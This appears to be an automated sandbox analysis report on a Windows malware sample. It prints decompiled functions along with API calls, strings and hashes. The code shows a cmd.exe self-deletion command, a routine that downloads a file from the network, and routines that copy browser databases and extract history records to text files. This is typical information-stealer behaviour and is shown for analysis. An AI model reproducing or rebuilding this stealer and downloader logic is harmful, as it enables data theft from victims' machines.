				_v348 =  &_v280;
				_v344 = 0;
				_v340 = 0;
				_v336 = 0;
				 *0x4648c4( &_v368);
				E0042A2F0( &_v368, 0, 0x3c);
				E0042A2F0( &_v280, 0, 0x104);
				ExitProcess(0);
			}

0x00423617
0x0042361c
0x0042361e
0x00423626
0x0042363b
0x0042364a
0x0042365e
0x00423670
0x00423684
0x00423689
0x00423690
0x00423693
0x00423695
0x00423695
0x0042369f
0x004236ac
0x004236b3
0x004236bb
0x004236bc
0x004236c1
0x004236c1
0x004236d0
0x004236da
0x004236e0
0x004236e6
0x004236f9
0x00423703
0x00423709
0x0042370f
0x00423719
0x00423723
0x00423729
0x0042372f
0x00423735
0x0042373b
0x0042374b
0x0042375d
0x00423766

APIs

_memset.LIBCMT ref: 0042363B
_memset.LIBCMT ref: 0042364A
lstrcat.KERNEL32(?,/c ), ref: 0042365E
lstrcat.KERNEL32(?,timeout /t 6 & del /f /q "), ref: 00423670
GetCurrentProcessId.KERNEL32(?,?,?,?,C21D6F0A,00000000), ref: 00423676

Part of subcall function 00423560: OpenProcess.KERNEL32(00000410,00000000,0040CA6B,?,00000010), ref: 0042358D
Part of subcall function 00423560: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,00000010), ref: 004235A8
Part of subcall function 00423560: CloseHandle.KERNEL32(00000000,?,00000010), ref: 004235AF
Part of subcall function 00423560: _strlen.LIBCMT ref: 004235CD

lstrcat.KERNEL32(?,00000000), ref: 0042369F
lstrcat.KERNEL32(?," & exit), ref: 004236E6
ShellExecuteEx.SHELL32(?), ref: 0042373B
_memset.LIBCMT ref: 0042374B
_memset.LIBCMT ref: 0042375D
ExitProcess.KERNEL32 ref: 00423766

Strings

C:\Windows\System32\cmd.exe, xrefs: 00423719
timeout /t 6 & del /f /q ", xrefs: 00423664
" & exit, xrefs: 004236C4
open, xrefs: 0042370F
/c , xrefs: 00423652
<, xrefs: 004236F9

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _memsetlstrcat$Process$CloseCurrentExecuteExitFileHandleModuleNameOpenShell_strlen
String ID: " & exit$/c $<$C:\Windows\System32\cmd.exe$open$timeout /t 6 & del /f /q "
API String ID: 1131015312-266446750
Opcode ID: 251c01d818ef84b9da2ebd1991f36ef68dc0ccc75dd2496836cb91c7c7ffdde1
Instruction ID: e0b948c116d9560b0a00aec62ca812e8ead60e3bdb3f18cbff0a3c7706133c14
Opcode Fuzzy Hash: 251c01d818ef84b9da2ebd1991f36ef68dc0ccc75dd2496836cb91c7c7ffdde1
Instruction Fuzzy Hash: BE31B3B190022CEBDB10DF55DC85BDAB778FB45705F4005EAE109A7240E7B95B84CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414160 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 137
networkfilesleepCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00414160(void* _a4, CHAR* _a8) {
				signed int _v8;
				void _v264;
				void _v1288;
				long _v1292;
				void* _v1296;
				char* _v1300;
				long _v1304;
				CHAR* _v1308;
				long _v1312;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				void* _t37;
				long _t44;
				void* _t50;
				void* _t61;
				void* _t62;
				signed int _t63;

				_t27 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t27 ^ _t63;
				_t61 = _a4;
				_t62 = 0;
				_v1308 = _a8;
				_v1300 = 0;
				_v1304 = 0x100;
				_t50 = InternetOpenA(0x443c1c, 1, 0, 0, 0);
				if(_t50 != 0) {
					_push("https");
					_push(E004140E0(_t50, _t61, _t61));
					if( *0x464890() == 0) {
						_v1300 = 1;
					}
					_v1296 = _t62;
					do {
						_push(0);
						if(_v1300 == 0) {
							_push(0x100);
						} else {
							_push(0x800100);
						}
						_t62 = InternetOpenUrlA(_t50, _t61, 0, 0, ??, ??);
						if(HttpQueryInfoA(_t62, 0x13,  &_v264,  &_v1304, 0) == 0) {
							goto L10;
						} else {
							_push("200");
							_push( &_v264);
							if( *0x464890() != 0) {
								Sleep(0x3e8);
								goto L10;
							}
						}
						break;
						L10:
						_t37 = _v1296 + 1;
						_v1296 = _t37;
					} while (_t37 < 3);
					_t61 = CreateFileA(_v1308, 0x40000000, 3, 0, 2, 0x80, 0);
					if(InternetReadFile(_t62,  &_v1288, 0x400,  &_v1292) != 0) {
						do {
							_t44 = _v1292;
							if(_t44 == 0) {
								goto L15;
							} else {
								if(WriteFile(_t61,  &_v1288, _t44,  &_v1312, 0) != 0) {
									_t44 = _v1292;
									if(_t44 == _v1312) {
										goto L15;
									}
								}
							}
							goto L17;
							L15:
						} while (_t44 >= 0x400 && InternetReadFile(_t62,  &_v1288, 0x400,  &_v1292) != 0);
					}
					L17:
					_t57 =  &_v1288;
					E0042A2F0( &_v1288, 0, 0x400);
					CloseHandle(_t61);
					InternetCloseHandle(_t62);
					_t30 = InternetCloseHandle(_t50);
				}
				return E0042A36A(_t30, _t50, _v8 ^ _t63, _t57, _t61, _t62);
			}

0x00414169
0x00414170
0x00414179
0x0041417c
0x00414188
0x0041418e
0x00414194
0x004141a4
0x004141a8
0x004141ae
0x004141bc
0x004141c5
0x004141c7
0x004141c7
0x004141d1
0x004141e0
0x004141e7
0x004141e9
0x004141f2
0x004141eb
0x004141eb
0x004141eb
0x00414213
0x00414220
0x00000000
0x00414222
0x00414222
0x0041422d
0x00414236
0x0041423d
0x00000000
0x0041423d
0x00414236
0x00000000
0x00414243
0x00414249
0x0041424a
0x00414250
0x0041427b
0x00414292
0x00414294
0x00414294
0x0041429c
0x00000000
0x0041429e
0x004142b8
0x004142ba
0x004142c6
0x00000000
0x00000000
0x004142c6
0x004142b8
0x00000000
0x004142c8
0x004142c8
0x00414294
0x004142ed
0x004142f2
0x004142fb
0x00414304
0x0041430b
0x00414312
0x00414312
0x00414328

APIs

InternetOpenA.WININET(00443C1C,00000001,00000000,00000000,00000000), ref: 0041419E

Part of subcall function 004140E0: _memset.LIBCMT ref: 004140FF
Part of subcall function 004140E0: _memset.LIBCMT ref: 0041410C
Part of subcall function 004140E0: lstrlen.KERNEL32(00000000,10000000,?,?,?,?,?,?,00000000), ref: 00414132
Part of subcall function 004140E0: InternetCrackUrlA.WININET(00000000,00000000), ref: 0041413A

StrCmpCA.SHLWAPI(00000000,https), ref: 004141BD
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004141FD
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00414218
StrCmpCA.SHLWAPI(?,200), ref: 0041422E
Sleep.KERNEL32(000003E8), ref: 0041423D
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0041426E
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041428A
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004142B0
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004142E3
_memset.LIBCMT ref: 004142FB
CloseHandle.KERNEL32(00000000), ref: 00414304
InternetCloseHandle.WININET(00000000), ref: 0041430B
InternetCloseHandle.WININET(00000000), ref: 00414312

Strings

200, xrefs: 00414222
https, xrefs: 004141AE

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Internet$File$CloseHandle_memset$OpenRead$CrackCreateHttpInfoQuerySleepWritelstrlen
String ID: 200$https
API String ID: 107165592-2945048398
Opcode ID: fd7bdcb11a3bb0fdb3c38170ac27d1583c67f3dd7aefdac4835a24720b887ce4
Instruction ID: ac123009da72ad75579f7fcde24bd9094efac00c20eabef040e318ff0b8adf28
Opcode Fuzzy Hash: fd7bdcb11a3bb0fdb3c38170ac27d1583c67f3dd7aefdac4835a24720b887ce4
Instruction Fuzzy Hash: 1E4195B5640618ABDB209B50DC49FEF7778EB85B46F004095F609E6180EBB89BC1CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00426970 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,00428D8F,00000000), ref: 00426979
StrCmpCA.SHLWAPI(?,004471D4,?,00428D8F,00000000), ref: 004269A5
StrCmpCA.SHLWAPI(?,.zip,?,00428D8F,00000000), ref: 004269BB
StrCmpCA.SHLWAPI(?,.zoo,?,00428D8F,00000000), ref: 004269CB
StrCmpCA.SHLWAPI(?,.arc,?,00428D8F,00000000), ref: 004269DB
StrCmpCA.SHLWAPI(?,.lzh,?,00428D8F,00000000), ref: 004269EB
StrCmpCA.SHLWAPI(?,.arj,?,00428D8F,00000000), ref: 004269FB
StrCmpCA.SHLWAPI(?,.gz,?,00428D8F,00000000), ref: 00426A0B
StrCmpCA.SHLWAPI(?,.tgz,?,00428D8F,00000000), ref: 00426A1B

Strings

.zoo, xrefs: 004269C5
.tgz, xrefs: 00426A15
.zip, xrefs: 004269B5
.arj, xrefs: 004269F5
.gz, xrefs: 00426A05
.arc, xrefs: 004269D5
.lzh, xrefs: 004269E5

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: be5849507d97375f0c18bab46697ae18329cb830c4a3370fd0953babe4bdf474
Instruction ID: bf2107bed19e6c27649b92ecc2787fd6c9e1d4daa23a69ceba4bc1e5eb35a104
Opcode Fuzzy Hash: be5849507d97375f0c18bab46697ae18329cb830c4a3370fd0953babe4bdf474
Instruction Fuzzy Hash: 7A11AE76341A712AAF113FA9BC087AF7BD89E43B513554027F808D3250EFAC98D2469E

Uniqueness

Uniqueness Score: -1.00%

Function 00415420 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 140
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E00415420(void* __ebx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v532;
				void* _v536;
				void* _v537;
				char _v544;
				intOrPtr _v548;
				signed int _t34;
				void* _t47;
				long _t51;
				void* _t56;
				void* _t57;
				void* _t68;
				void* _t71;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t95;
				void* _t98;
				signed int _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;

				_t34 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t34 ^ _t99;
				_t94 = _a8;
				_v548 = _a24;
				E0042A2F0( &_v268, 0, 0x104);
				_t84 =  *0x453978; // 0x25c13d0
				 *0x464860( &_v268, _t84, __edi, __esi, __ebx);
				 *0x464860( &_v268, E00420520(_t94, _t107, 0x1a));
				CopyFileA(_a4,  &_v268, 1);
				E0042A2F0( &_v528, 0, 0x104);
				wsprintfA( &_v528, "\\History\\%s_%s.txt", _a12, _t94);
				_t47 =  *0x453dbc( &_v268,  &_v544);
				_t102 = _t100 + 0x30;
				_pop(_t95);
				_pop(_t98);
				_pop(_t71);
				if(_t47 == 0) {
					_t88 =  *0x4537a0; // 0x25c5f20
					_t51 =  *0x453d68(_v544, _t88, 0xffffffff,  &_v532, _t47);
					_t103 = _t102 + 0x14;
					if(_t51 == 0) {
						_t56 = HeapAlloc(GetProcessHeap(), _t51, 0xf423f);
						_v536 = _t56;
						_t57 =  *0x453d84(_v532);
						_t105 = _t103 + 4;
						if(_t57 == 0x64) {
							do {
								 *0x453da8(_v532, 0);
								 *0x464860(_v536,  *0x453da8(_v532, 0));
								 *0x464860(_v536, "\n");
								_t68 =  *0x453d84(_v532);
								_t105 = _t105 + 0x14;
							} while (_t68 == 0x64);
						}
						E00429620(_v548,  &_v528, _v536,  *0x464758(_v536));
						E0042A2F0( &_v536, 0, 4);
						_t103 = _t105 + 0x1c;
					}
					 *0x453d88(_v532);
					 *0x453dc0(_v544);
				}
				return E0042A36A(DeleteFileA( &_v268), _t71, _v8 ^ _t99,  &_v268, _t95, _t98);
			}

0x00415429
0x00415430
0x0041543f
0x00415450
0x00415456
0x0041545b
0x0041546c
0x00415487
0x00415497
0x004154ab
0x004154be
0x004154d2
0x004154d8
0x004154db
0x004154dc
0x004154dd
0x004154e0
0x004154e6
0x004154fe
0x00415504
0x00415509
0x0041551c
0x00415529
0x0041552f
0x00415535
0x0041553b
0x00415540
0x00415549
0x00415569
0x0041557b
0x00415588
0x0041558e
0x00415591
0x00415540
0x004155b9
0x004155c9
0x004155ce
0x004155ce
0x004155d8
0x004155e5
0x004155eb
0x00415608

APIs

_memset.LIBCMT ref: 00415456
lstrcat.KERNEL32(?,025C13D0), ref: 0041546C

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 00415487
CopyFileA.KERNEL32(?,?,00000001), ref: 00415497
_memset.LIBCMT ref: 004154AB
wsprintfA.USER32 ref: 004154BE
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00415515
HeapAlloc.KERNEL32(00000000), ref: 0041551C
lstrcat.KERNEL32(?,00000000), ref: 00415569
lstrcat.KERNEL32(?,00443C5C), ref: 0041557B
lstrlen.KERNEL32(?), ref: 0041559D
_memset.LIBCMT ref: 004155C9
DeleteFileA.KERNEL32(?), ref: 004155F5

Strings

\History\%s_%s.txt, xrefs: 004154B8
ZHaZea, xrefs: 0041552F, 00415588

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
String ID: ZHaZea$\History\%s_%s.txt
API String ID: 708870984-3585377772
Opcode ID: 3b7e81b6aadeb811707359a7f86d3cebae343f55fb4d849c41f05e263e2879c4
Instruction ID: 5ca9708e7a0d1a08db2627111b1c036c23ebd19baebcc0264a8b632e95b537ff
Opcode Fuzzy Hash: 3b7e81b6aadeb811707359a7f86d3cebae343f55fb4d849c41f05e263e2879c4
Instruction Fuzzy Hash: 8B5186B5A40318ABCB10EFA4DC89FEA7378EF98701F004599F60597141E674EA84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00415F00 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 136
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00415F00(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v532;
				char _v536;
				void* _v537;
				char _v544;
				intOrPtr _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t46;
				long _t50;
				void* _t56;
				void* _t66;
				intOrPtr _t79;
				intOrPtr _t86;
				intOrPtr _t88;
				signed int _t89;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;

				_t33 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t33 ^ _t89;
				_t67 = _a12;
				_t86 = _a8;
				_v548 = _a16;
				E0042A2F0( &_v268, 0, 0x104);
				_t79 =  *0x453978; // 0x25c13d0
				 *0x464860( &_v268, _t79);
				 *0x464860( &_v268, E00420520(_t86, _t97, 0x1a));
				CopyFileA(_a4,  &_v268, 1);
				E0042A2F0( &_v528, 0, 0x104);
				wsprintfA( &_v528, "\\History\\%s_%s.txt", _a12, _t86);
				_t88 =  *0x4535cc; // 0x25c6b60
				_t81 =  &_v544;
				_t46 =  *0x453dbc( &_v268,  &_v544);
				_t92 = _t90 + 0x30;
				if(_t46 == 0) {
					_t50 =  *0x453d68(_v544, _t88, 0xffffffff,  &_v536, _t46);
					_t93 = _t92 + 0x14;
					if(_t50 == 0) {
						_v532 = HeapAlloc(GetProcessHeap(), _t50, 0xf423f);
						_t56 =  *0x453d84(_v536);
						_t95 = _t93 + 4;
						if(_t56 == 0x64) {
							do {
								 *0x464860(_v532,  *0x453da8(_v536, 0));
								 *0x464860(_v532, "\n");
								_t66 =  *0x453d84(_v536);
								_t95 = _t95 + 0xc;
							} while (_t66 == 0x64);
						}
						E00429620(_v548,  &_v528, _v532,  *0x464758(_v532));
						E0042A2F0( &_v532, 0, 4);
						_t93 = _t95 + 0x1c;
					}
					 *0x453d88(_v536);
					_t81 = _v544;
					 *0x453dc0(_v544);
				}
				return E0042A36A(DeleteFileA( &_v268), _t67, _v8 ^ _t89, _t81, _t86, _t88);
			}

0x00415f09
0x00415f10
0x00415f17
0x00415f1f
0x00415f30
0x00415f36
0x00415f3b
0x00415f4c
0x00415f67
0x00415f77
0x00415f8b
0x00415f9e
0x00415fa4
0x00415faa
0x00415fb8
0x00415fbe
0x00415fc3
0x00415fdb
0x00415fe1
0x00415fe6
0x00415fff
0x0041600c
0x00416012
0x00416018
0x00416020
0x0041603a
0x0041604c
0x00416059
0x0041605f
0x00416062
0x00416020
0x0041608a
0x0041609a
0x0041609f
0x0041609f
0x004160a9
0x004160af
0x004160b6
0x004160bc
0x004160dc

APIs

_memset.LIBCMT ref: 00415F36
lstrcat.KERNEL32(?,025C13D0), ref: 00415F4C

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 00415F67
CopyFileA.KERNEL32(?,?,00000001), ref: 00415F77
_memset.LIBCMT ref: 00415F8B
wsprintfA.USER32 ref: 00415F9E
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00415FF2
HeapAlloc.KERNEL32(00000000), ref: 00415FF9
lstrcat.KERNEL32(?,00000000), ref: 0041603A
lstrcat.KERNEL32(?,00443C5C), ref: 0041604C
lstrlen.KERNEL32(?), ref: 0041606E
_memset.LIBCMT ref: 0041609A
DeleteFileA.KERNEL32(?), ref: 004160C6

Strings

\History\%s_%s.txt, xrefs: 00415F98
ZHaZea, xrefs: 0041600C, 00416059

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
String ID: ZHaZea$\History\%s_%s.txt
API String ID: 708870984-3585377772
Opcode ID: 62bcf3099237cfced7af89be2c8dd075b1a0f5fa32274552dbd580376dd374d5
Instruction ID: 8c916cc95fafd4df5b0128c3787dcebb17da4a368f0967ac496bceb1898a01b7
Opcode Fuzzy Hash: 62bcf3099237cfced7af89be2c8dd075b1a0f5fa32274552dbd580376dd374d5
Instruction Fuzzy Hash: AE51677594031CABCB10EF64DC89FDA7778AF58701F0045A9F60993141EB74EA84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004179D0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 112
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E004179D0(void* __ebx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v5008;
				void* __esi;
				signed int _t13;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				_Unknown_base(*)()* _t30;
				struct HINSTANCE__* _t31;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t33;
				CHAR* _t34;
				_Unknown_base(*)()* _t35;
				struct HINSTANCE__* _t36;
				_Unknown_base(*)()* _t37;
				void* _t39;
				CHAR* _t46;
				CHAR* _t47;
				struct HINSTANCE__* _t48;
				CHAR* _t49;
				CHAR* _t52;
				struct HINSTANCE__* _t53;
				CHAR* _t54;
				void* _t55;
				intOrPtr _t56;
				signed int _t57;

				_t55 = __edi;
				_t39 = __ebx;
				E0042BC40(0x138c);
				_t13 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t13 ^ _t57;
				_t56 = _a4;
				if(_t56 == 0) {
					L10:
					return E0042A36A(0, _t39, _v8 ^ _t57, _t50, _t55, _t56);
				} else {
					GetEnvironmentVariableA("PATH", 0x453e08, 0xffff);
					E0042A2F0( &_v5008, 0, 0x1388);
					 *0x464860( &_v5008, 0x453e08);
					 *0x464860( &_v5008, ";");
					 *0x464860( &_v5008, _t56);
					SetEnvironmentVariableA("PATH",  &_v5008);
					_t50 =  &_v5008;
					E0042A2F0( &_v5008, 0, 0x1388);
					_t26 =  *0x453a74; // 0x25c5ca0
					_t27 = LoadLibraryA(_t26);
					 *0x453db0 = _t27;
					if(_t27 != 0) {
						_t46 =  *0x4535f4; // 0x25c6140
						_t30 = GetProcAddress(_t27, _t46);
						_t52 =  *0x4539d8; // 0x25c6f78
						 *0x453da4 = _t30;
						_t31 =  *0x453db0; // 0x0
						_t32 = GetProcAddress(_t31, _t52);
						_t47 =  *0x4534f0; // 0x25c5e40
						_t53 =  *0x453db0; // 0x0
						 *0x453dc4 = _t32;
						_t33 = GetProcAddress(_t53, _t47);
						_t48 =  *0x453db0; // 0x0
						 *0x453d6c = _t33;
						_t34 =  *0x453424; // 0x25c6f90
						_t35 = GetProcAddress(_t48, _t34);
						_t54 =  *0x453b8c; // 0x25c5f60
						 *0x453d94 = _t35;
						_t36 =  *0x453db0; // 0x0
						_t37 = GetProcAddress(_t36, _t54);
						_t49 =  *0x45369c; // 0x25c6f60
						_t50 =  *0x453db0; // 0x0
						 *0x453db4 = _t37;
						 *0x453d8c = GetProcAddress(_t50, _t49);
					}
					if( *0x453da4 == 0 ||  *0x453dc4 == 0 ||  *0x453d6c == 0 ||  *0x453db4 == 0 ||  *0x453d8c == 0 ||  *0x453d94 == 0) {
						goto L10;
					} else {
						return E0042A36A(1, _t39, _v8 ^ _t57, _t50, _t55, _t56);
					}
				}
			}

0x004179d0
0x004179d0
0x004179d8
0x004179dd
0x004179e4
0x004179e8
0x004179ed
0x00417b68
0x00417b78
0x004179f3
0x00417a02
0x00417a16
0x00417a2a
0x00417a3c
0x00417a4a
0x00417a5c
0x00417a67
0x00417a70
0x00417a75
0x00417a7e
0x00417a84
0x00417a8b
0x00417a91
0x00417a99
0x00417a9f
0x00417aa5
0x00417aaa
0x00417ab1
0x00417ab7
0x00417abd
0x00417ac5
0x00417aca
0x00417ad0
0x00417ad6
0x00417adb
0x00417ae2
0x00417ae8
0x00417aee
0x00417af3
0x00417afa
0x00417b00
0x00417b06
0x00417b0e
0x00417b19
0x00417b19
0x00417b25
0x00000000
0x00417b54
0x00417b67
0x00417b67
0x00417b25

APIs

GetEnvironmentVariableA.KERNEL32(PATH,00453E08,0000FFFF,025C6320,?,00417CE1,025C13D0,?,?,?,?,?,00000000,?,00000000), ref: 00417A02
_memset.LIBCMT ref: 00417A16
lstrcat.KERNEL32(?,00453E08), ref: 00417A2A
lstrcat.KERNEL32(?,004459AC), ref: 00417A3C
lstrcat.KERNEL32(?,025C13D0), ref: 00417A4A
SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,?,?,00000000,?,00000000), ref: 00417A5C
_memset.LIBCMT ref: 00417A70
LoadLibraryA.KERNEL32(025C5CA0,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00417A7E
GetProcAddress.KERNEL32(00000000,025C6140), ref: 00417A99
GetProcAddress.KERNEL32(00000000,025C6F78), ref: 00417AB1
GetProcAddress.KERNEL32(00000000,025C5E40), ref: 00417ACA
GetProcAddress.KERNEL32(00000000,025C6F90), ref: 00417AE2
GetProcAddress.KERNEL32(00000000,025C5F60), ref: 00417AFA
GetProcAddress.KERNEL32(00000000,025C6F60), ref: 00417B13

Strings

PATH, xrefs: 004179FD, 00417A57

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressProc$lstrcat$EnvironmentVariable_memset$LibraryLoad
String ID: PATH
API String ID: 3772005587-1036084923
Opcode ID: 1dda10c1a6aba840fd6ee6d973c577a2b6e5a04c4b56c8ec8ec55162e807bdc5
Instruction ID: 7ccb177e9953af526fa7fd1dc49e7074da5b24d141281455e02550b1704620b5
Opcode Fuzzy Hash: 1dda10c1a6aba840fd6ee6d973c577a2b6e5a04c4b56c8ec8ec55162e807bdc5
Instruction Fuzzy Hash: 10418EB5A04304ABDB10DF64EC59AA673B4E788747F00447AF901833A2EB74EA48CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B227 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 107
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040B227(void* __ebx) {
				void* __edi;
				void* __esi;
				void* _t32;
				intOrPtr _t33;
				void* _t35;
				void* _t37;
				intOrPtr _t41;
				void* _t50;
				intOrPtr _t52;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				signed int _t75;
				void* _t77;

				_t50 = __ebx;
				do {
					_push(".");
					_push(_t75 - 0x534);
					if( *0x464890() != 0) {
						_t37 =  *0x464890(_t75 - 0x534, "..");
						_t84 = _t37;
						if(_t37 != 0) {
							wsprintfA(_t75 - 0x420, "%s\\%s", _t73, _t75 - 0x534);
							E0042A2F0(_t75 - 0x114, 0, 0x104);
							_t41 =  *0x453978; // 0x25c13d0
							 *0x464860(_t75 - 0x114, _t41);
							 *0x464860(_t75 - 0x114, E00420520(_t71, _t84, 0x1a));
							CopyFileA(_t75 - 0x420, _t75 - 0x114, 1);
							E0040AD50(_t84, _t75 - 0x114,  *((intOrPtr*)(_t75 - 0x564)));
							_t77 = _t77 + 0x24;
							DeleteFileA(_t75 - 0x114);
						}
					}
				} while (FindNextFileA(_t71, _t75 - 0x560) != 0);
				FindClose(_t71);
				E0042A2F0(_t75 - 0x218, 0, 0x104);
				_t52 =  *0x453b6c; // 0x25c8338
				 *0x464860(_t75 - 0x218, _t52);
				_t32 =  *0x464758( *((intOrPtr*)(_t75 - 0x564)));
				_t33 =  *0x453ca0; // 0x0
				_t70 = _t75 - 0x218;
				E00429620(_t33, _t75 - 0x218,  *((intOrPtr*)(_t75 - 0x564)), _t32);
				_t35 = E0042A2F0(_t75 - 0x564, 0, 4);
				if( *((intOrPtr*)(_t75 + 0x1c)) >= 0x10) {
					_t70 =  *((intOrPtr*)(_t75 + 8));
					_push( *((intOrPtr*)(_t75 + 8)));
					_t35 = E0042A289();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				_pop(_t72);
				_pop(_t74);
				return E0042A36A(_t35, _t50,  *(_t75 - 0x10) ^ _t75, _t70, _t72, _t74);
			}

0x0040b227
0x0040b230
0x0040b230
0x0040b23b
0x0040b244
0x0040b256
0x0040b25c
0x0040b25e
0x0040b278
0x0040b28c
0x0040b291
0x0040b2a1
0x0040b2bc
0x0040b2d2
0x0040b2e6
0x0040b2eb
0x0040b2f5
0x0040b2f5
0x0040b25e
0x0040b309
0x0040b312
0x0040b326
0x0040b32b
0x0040b33c
0x0040b349
0x0040b356
0x0040b35c
0x0040b364
0x0040b374
0x0040b380
0x0040b382
0x0040b385
0x0040b386
0x0040b38b
0x0040b391
0x0040b399
0x0040b39a
0x0040b3a8

APIs

StrCmpCA.SHLWAPI(?,004456B0), ref: 0040B23C
StrCmpCA.SHLWAPI(?,004456AC), ref: 0040B256
wsprintfA.USER32 ref: 0040B278
_memset.LIBCMT ref: 0040B28C
lstrcat.KERNEL32(?,025C13D0), ref: 0040B2A1

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 0040B2BC
CopyFileA.KERNEL32(?,?,00000001), ref: 0040B2D2

Part of subcall function 0040AD50: _memset.LIBCMT ref: 0040AD99
Part of subcall function 0040AD50: _memset.LIBCMT ref: 0040ADAB
Part of subcall function 0040AD50: lstrcat.KERNEL32(?,00000000), ref: 0040ADCE
Part of subcall function 0040AD50: lstrcat.KERNEL32(?,025C8AF8), ref: 0040ADE2
Part of subcall function 0040AD50: lstrcat.KERNEL32(?,?), ref: 0040ADF6
